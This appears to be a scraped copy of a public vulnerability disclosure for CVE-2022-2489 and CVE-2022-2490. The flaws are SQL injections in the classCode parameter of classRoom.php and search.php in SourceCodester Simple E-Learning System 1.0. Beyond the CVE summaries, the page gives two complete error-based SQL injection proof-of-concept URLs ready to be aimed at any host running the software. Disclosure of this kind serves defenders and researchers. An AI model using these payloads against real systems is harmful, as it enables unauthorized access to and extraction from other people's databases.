Headline
CVE-2022-2490: CVEproject/Simple-E-Learning-System.md at main · xiahao90/CVEproject
A vulnerability classified as critical has been found in SourceCodester Simple E-Learning System 1.0. Affected is an unknown function of the file search.php. The manipulation of the argument classCode with the input 1’||(SELECT 0x74666264 WHERE 5610=5610 AND (SELECT 7504 FROM(SELECT COUNT(),CONCAT(0x7171627a71,(SELECT (ELT(7504=7504,1))),0x71717a7071,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||’ leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
Permalink
Cannot retrieve contributors at this time
Exploit Title: Simple E-Learning System - Multiple SQL injections****Date: 2022-07/20****Exploit Author: [email protected]****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php-simple-e-learning-system-source-code****Version: 1.0****Tested on: windows10 + phpstudy****1./classRoom.php(CVE-2022-2489)
/classRoom.php SQL injection exists for parameter classCode
Sample request POC #1
http://[ip:port]/classRoom.php?classCode=1'||(SELECT 0x6770715a WHERE 8795=8795 AND (SELECT 8342 FROM(SELECT COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(8342=8342,1))),0x717a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
Sqlmap running results
2./search.php(CVE-2022-2490)
/search.php SQL injection exists for parameter classCode
Sample request POC #2
http://[ip:port]/search.php?classCode=1'||(SELECT 0x74666264 WHERE 5610=5610 AND (SELECT 7504 FROM(SELECT COUNT(*),CONCAT(0x7171627a71,(SELECT (ELT(7504=7504,1))),0x71717a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
Sqlmap running results
Related news
A vulnerability was found in SourceCodester Simple E-Learning System 1.0. It has been rated as critical. This issue affects some unknown processing of the file classRoom.php. The manipulation of the argument classCode with the input 1'||(SELECT 0x6770715a WHERE 8795=8795 AND (SELECT 8342 FROM(SELECT COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(8342=8342,1))),0x717a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||' leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.